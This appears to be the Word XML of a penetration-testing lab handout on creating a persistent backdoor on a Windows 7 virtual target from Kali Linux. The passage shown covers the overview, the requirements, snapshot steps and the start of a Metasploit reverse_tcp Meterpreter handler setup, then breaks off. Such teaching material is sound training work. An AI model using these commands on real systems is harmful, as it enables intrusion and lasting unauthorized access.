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EAF4C6" w14:textId="67150A48" w:rsidR="006114B0" w:rsidRPr="006114B0" w:rsidRDefault="006114B0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006114B0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab – Creating </w:t>
      </w:r>
      <w:r w:rsidR="00415975">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidRPr="006114B0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Persistent </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Backdoor</w:t>
      </w:r>
      <w:r w:rsidRPr="006114B0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Using Service Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1134BA6B" w14:textId="389D6790" w:rsidR="006114B0" w:rsidRDefault="006114B0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006114B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099ACE97" w14:textId="0A8F403A" w:rsidR="006114B0" w:rsidRDefault="006114B0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pP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In our previous lab, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>we learned how to establish a Meterpreter session by creating an</w:t>
      </w:r>
      <w:r w:rsidR="00F207CA">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> uploading a payload to our target. For this </w:t>
      </w:r>
      <w:r w:rsidR="00415975">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">lab </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">or any persistent connect lab to work, we first need to have an established Meterpreter session with full admin rights. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705936DF" w14:textId="5E979969" w:rsidR="006114B0" w:rsidRDefault="006114B0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>A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lot of hard work </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>goes into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exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>ing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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>a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system</w:t>
      </w:r>
      <w:r w:rsidR="00F207CA">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>. O</w:t>
      </w:r>
      <w:r w:rsidRPr="006114B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>nce the system is exploited successfully</w:t>
      </w:r>
      <w:r w:rsidR="00F207CA">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>,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you need more time </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>to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further examine or penetrate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>further into the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victim’s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>network</w:t>
      </w:r>
      <w:r w:rsidR="00415975">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>.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</w:t>
      </w:r>
      <w:r w:rsidR="00415975">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>f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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidRPr="006114B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>victim shut</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>s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down </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>the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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>target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or change</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>s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the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">ir </w:t>
      </w:r>
      <w:r w:rsidRPr="006114B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">, 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all your hard work </w:t>
      </w:r>
      <w:r w:rsidR="00415975">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>will be lost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. That is why maintaining </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>a persistent backdoor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is an </w:t>
      </w:r>
      <w:r w:rsidR="00F207CA">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>essential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phase of penetration testing. Persistence consists of </w:t>
      </w:r>
      <w:r w:rsidR="00F207CA">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>cybercriminals’ technique</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>s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to </w:t>
      </w:r>
      <w:r w:rsidR="00415975">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>help maintain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access to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">the 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systems </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">regardless of the number of </w:t>
      </w:r>
      <w:r w:rsidRPr="006114B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>restarts, changed credentials</w:t>
      </w:r>
      <w:r w:rsidR="00F207CA">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>,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and other interruptions that could cut off </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="006114B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F21A8A" w14:textId="4F1BB8BB" w:rsidR="006114B0" w:rsidRDefault="006114B0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006114B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>Lab Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FC486F" w14:textId="19D3EB76" w:rsidR="006114B0" w:rsidRPr="006114B0" w:rsidRDefault="006114B0" w:rsidP="006114B0">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006114B0">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>One virtual install of Window 7</w:t>
      </w:r>
      <w:r w:rsidR="00E93DBA">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006114B0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="006114B0">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Target </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0173C31D" w14:textId="599B89EF" w:rsidR="006114B0" w:rsidRPr="00E93DBA" w:rsidRDefault="006114B0" w:rsidP="006114B0">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006114B0">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>One virtual install of Kali Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="006114B0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidRPr="006114B0">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacker </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F078D7C" w14:textId="71FCDAD1" w:rsidR="00E93DBA" w:rsidRPr="00E93DBA" w:rsidRDefault="00E93DBA" w:rsidP="006114B0">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">An established Meterpreter session with full admin rights with the target </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758AB5AC" w14:textId="21D05B69" w:rsidR="006114B0" w:rsidRDefault="003978D8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r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Take a </w:t>
      </w:r>
      <w:r w:rsidR="00F207CA">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r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napshot of your </w:t>
      </w:r>
      <w:r w:rsidR="00B702ED">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r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indows 7 </w:t>
      </w:r>
      <w:r w:rsidR="00F207CA">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>arget</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279E6CC7" w14:textId="309FAD3E" w:rsidR="00B202FF" w:rsidRDefault="00B202FF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B202FF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>Ensure that you have performed a snapshot of your Windows 7 target</w:t>
      </w:r>
      <w:r w:rsidR="00F207CA">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>. T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>his will allow you to rollback your target to a clean default with just the payload.exe file present needed to establish a Meterpreter</w:t>
      </w:r>
      <w:r w:rsidR="003978D8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> session </w:t>
      </w:r>
      <w:r w:rsidR="00F207CA">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>before</w:t>
      </w:r>
      <w:r w:rsidR="003978D8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> creating a</w:t>
      </w:r>
      <w:r w:rsidR="00F207CA">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>ny</w:t>
      </w:r>
      <w:r w:rsidR="003978D8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> persistent backdoor. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DD125F" w14:textId="64B1EED0" w:rsidR="00EA255E" w:rsidRDefault="00EA255E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noProof/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="699FD37C" wp14:editId="1307B351">
            <wp:extent cx="4265438" cy="1745656"/>
            <wp:effectExtent l="0" t="0" r="19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155" cy="176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38020" w14:textId="4C6356FA" w:rsidR="0012481E" w:rsidRDefault="0012481E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>Give your snapshot a user-friendly name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24566E26" w14:textId="14581626" w:rsidR="0012481E" w:rsidRDefault="0012481E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noProof/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B0666D8" wp14:editId="7A8A1FC2">
            <wp:extent cx="3409179" cy="1438732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378" cy="145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6756B" w14:textId="19C795B7" w:rsidR="0012481E" w:rsidRDefault="0012481E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lastRenderedPageBreak/>
        <w:t xml:space="preserve">When you need to restore, power off your Windows 7 target and </w:t>
      </w:r>
      <w:r w:rsidR="003122CD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>launch the restore function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B35EA9" w14:textId="5E7871BE" w:rsidR="003122CD" w:rsidRDefault="003122CD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noProof/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28C67406" wp14:editId="72E64736">
            <wp:extent cx="4228439" cy="1957711"/>
            <wp:effectExtent l="0" t="0" r="12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86" cy="199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6A5B" w14:textId="0F7AE8FC" w:rsidR="00B702ED" w:rsidRDefault="00B702ED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B702ED"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Establish </w:t>
      </w:r>
      <w:r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a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B702ED">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>Meterpreter Session</w:t>
      </w:r>
      <w:r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 and</w:t>
      </w:r>
      <w:r w:rsidRPr="00B702ED"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 bypass the UAC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D44E072" w14:textId="41ACEF6F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Open a Kali terminal, and at the prompt, type </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB479F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66635EC3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AB479F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71A2A7D9" wp14:editId="080E2147">
            <wp:extent cx="4153480" cy="59063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4785" w14:textId="77777777" w:rsidR="00B702ED" w:rsidRPr="0063489C" w:rsidRDefault="00B702ED" w:rsidP="00B702ED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> prompt type, </w:t>
      </w:r>
      <w:r w:rsidRPr="0063489C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBF6347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63489C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="211F5492" wp14:editId="49FC2C38">
            <wp:extent cx="2829320" cy="4001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9D7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Press enter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F94F26" w14:textId="77777777" w:rsidR="00B702ED" w:rsidRPr="0063489C" w:rsidRDefault="00B702ED" w:rsidP="00B702ED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs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next prompt, type, </w:t>
      </w:r>
      <w:r w:rsidRPr="0063489C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set payload windows/meterpreter/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0063489C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7F5E29F6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63489C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
